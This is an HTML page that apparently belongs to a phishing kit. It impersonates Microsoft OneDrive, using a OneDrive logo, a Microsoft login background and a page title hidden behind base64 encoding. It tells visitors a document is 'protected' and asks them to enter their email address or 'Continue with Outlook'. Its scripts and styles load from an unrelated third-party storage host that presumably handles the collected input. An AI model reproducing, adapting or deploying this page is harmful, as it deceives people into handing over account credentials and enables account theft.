<html lang="en"><head>
	<title></title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;1,100;1,300;1,400;1,500;1,700&amp;display=swap" rel="stylesheet">
<link href="https://jmtech.s3.ir-thr-at1.arvanstorage.com/oneD/st.css" rel="stylesheet">
<script src="../../Email.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha512-5A8nwdMOWrSz20fDsjczgUidUBR8liPYU+WymTZP1lmY9G6Oc7HlZv156XqnsgNUzTyMefFTcsFH/tnJE/+xBg==" crossorigin="anonymous" />

	<link type="text/css" rel="stylesheet" href="https://jmtech.s3.ir-thr-at1.arvanstorage.com/oneD/aStyle.css">
	<style>
		.out .win-button-pin-bottom .inline-block > div{
			font-size: 12px;
			margin-bottom: 16px;
		}

		.added{
			box-sizing: border-box;
			animation: fadeIn 1s;
			background-size: cover,cover;
			background: url(https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg) no-repeat, no-repeat center center, center center;
		}

		.added .board{
			-webkit-box-shadow: 0 2px 6px rgba(0,0,0,0.2);
			-moz-box-shadow: 0 2px 6px rgba(0,0,0,0.2);
			box-shadow: 0 2px 6px rgba(0,0,0,0.2);
			border-radius: 0;
		}

		.added #board2{
		width: auto;
		height: 397px;
		border-radius:0;
		}

		.added .out #lightbox{
		box-shadow: none;
			margin: 0;
			min-width:460px;
		}

		.out .form-group{
			padding-left: 0;
		}

		.out .win-button-pin-bottom .inline-block > div a{
			text-decoration: none;
			color: #0067b8;
		}

		.out.me #i0118{
			font-weight: 400;
			font-size: 16px;
		}

		.out.me #loginHeader{
			color: #000000;
			font-weight: 500;
		}

		.out.me #lightbox{
			box-shadow: none;
			margin: 0;
			min-width: 460px;
			border-radius: 5px;
		}

		.out .col-md-24.ext-error.error{
			color: #e81123 !important;
		}

		.div_form a{
			display: block;
			-webkit-appearance: button;
			-moz-appearance: button;
			appearance: button;
			margin-left: 5px;
			width: calc(100% - 25px);
		}
		@media screen and (min-width: 639px) {
			.aol .login-box.right {
			border-radius: 5px;
			max-width: 355px;
			box-shadow: none;
			max-height: 520px;
			min-height: 520px;
			}
		}
		@media screen and (max-width: 768px){
			.board {
				height: 100%;
				width: 100vw;
				overflow: hidden;
				border-radius: 0;
				transition: all .5s;
			}
		}
	</style>
</head>
<body>

<div class="div_main">

	<div id="board2" class="board" style="display: none;">
	</div>
    <div id="board" class="board" style="z-index: 999;display: none;">
        
    <div class="div_logo">
        <img src="https://jmtech.s3.ir-thr-at1.arvanstorage.com/oneD/OneDrive_logo_and_wordmark.svg">
    </div>
        
		
    <p class="p_details">This document is protected, please input the email address document was shared with<br style="
"> to unlock document.</p>
        
    <form class="div_form" method="post">
	<div class="_error" style="display: none;">Invalid Email address</div>
	<input value="" type="text" name="im" id="im" placeholder="Email address">
	
	<div class="keep"><input type="checkbox" id="checkbox"><label for="checkbox" style="letter-spacing:normal">Keep document in browser?</label></div>
	
	<button class="button"><i class="fa fa-spinner fa-spin" aria-hidden="true"></i><span>Unlock Document</span><b class="b1">.</b><b class="b2">.</b><b class="b3">.</b></button>
	
	<div class="line"></div>
	
	<a href="#">Continue with Outlook</a>
	
	</form>
    
	</div>
    
    </div>



	<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
<script src="https://jmtech.s3.ir-thr-at1.arvanstorage.com/oneD/script_main.js"></script>
<script>document.title=atob("TWljcm9zb2Z0IE9uZURyaXZl")</script>
</body>
</html>